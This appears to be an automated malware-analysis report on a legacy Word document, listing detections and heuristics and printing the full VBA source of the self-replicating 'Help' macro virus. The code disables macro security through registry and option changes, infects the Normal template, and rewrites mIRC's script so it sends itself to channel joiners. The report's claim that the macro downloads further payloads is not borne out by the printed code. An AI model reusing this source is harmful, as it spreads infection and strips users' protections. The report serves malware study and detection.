MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
This legacy Word macro-based malware, identified as Win.Trojan.Psycho-3, attempts to spread by infecting the Normal template and disabling Word's macro security. The AutoOpen macro copies itself to the Normal template and modifies registry keys to disable virus protection and set the registered owner to 'The WaLRuS'. It also attempts to download and execute further payloads via IRC-related paths.
Heuristics 4
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2719 bytes |
SHA-256: 51cc4820485a023cdb84408ab3fd96df7075cb94f3f50e33502b785cf8333a47 |
|||
|
Detection
ClamAV:
Doc.Trojan.Fool-5
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Help"
Sub AutoOpen()
'Help Virus/Worm v1.00
'The WaLRuS 05/00
On Error Resume Next
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
ActiveDocument.ReadOnlyRecommended = False
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "The WaLRuS"
Set Norm = NormalTemplate.VBProject.VBComponents: Set Doc = ActiveDocument.VBProject.VBComponents
If Norm.Item("Help").Name <> "Help" Then
Doc("Help").Export "c:\Help.drv"
Set infect = NormalTemplate.VBProject
ElseIf Doc.Item("Help").Name <> "Help" Then
Norm("Help").Export "c:\Help.drv"
Set infect = ActiveDocument.VBProject
End If
infect.VBComponents.Import ("c:\Help.drv")
Kill ("c:\Help.drv")
ActiveDocument.Save
CommandBars("Help").Controls("About Microsoft Word").Caption = "Its The WaLRuS"
If (Second(Now()) > 50) Then Call Mirc
If Day(Now) = 31 Then Call Help
End Sub
Sub Mirc()
On Error Resume Next
installed = Dir("c:\mirc\mirc32.exe")
If installed = "" Then
Exit Sub
Else
reproduce = Dir("c:\mirc\download\IRC-Rules.doc")
If reproduce = "" Then ActiveDocument.SaveAs "c:\mirc\download\IRC-Rules.doc"
Kill "c:\mirc\script.ini"
Open "c:\mirc\script.ini" For Output As #1
Print #1, "[script]"
Print #1, "n0=on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick c:\mirc\download\IRC-Rules.doc }"
Print #1, "n1=on 1:CONNECT: {"
Print #1, "n2= /join #virus "
Print #1, "n3= /msg #virus Help me if you can im feeling down. Im infected with the Help Virus by The WaLRuS"
Print #1, "n4= /part #virus"
Print #1, "n5= /clear"
Print #1, "n6= /motd"
Print #1, "n7= }"
Close #1
End If
End Sub
Sub HelpAbout()
On Error Resume Next
MsgBox "Help by The WaLRuS", 0, "Help I Need Somebody"
End Sub
Sub Help()
On Error Resume Next
Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "I do appreciate you being around"
.Heading = "GREETINGS"
.Show
End With
End Sub
Sub ToolsMacro()
End Sub
Sub FileTemplates()
End Sub
Sub ViewVBCode()
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.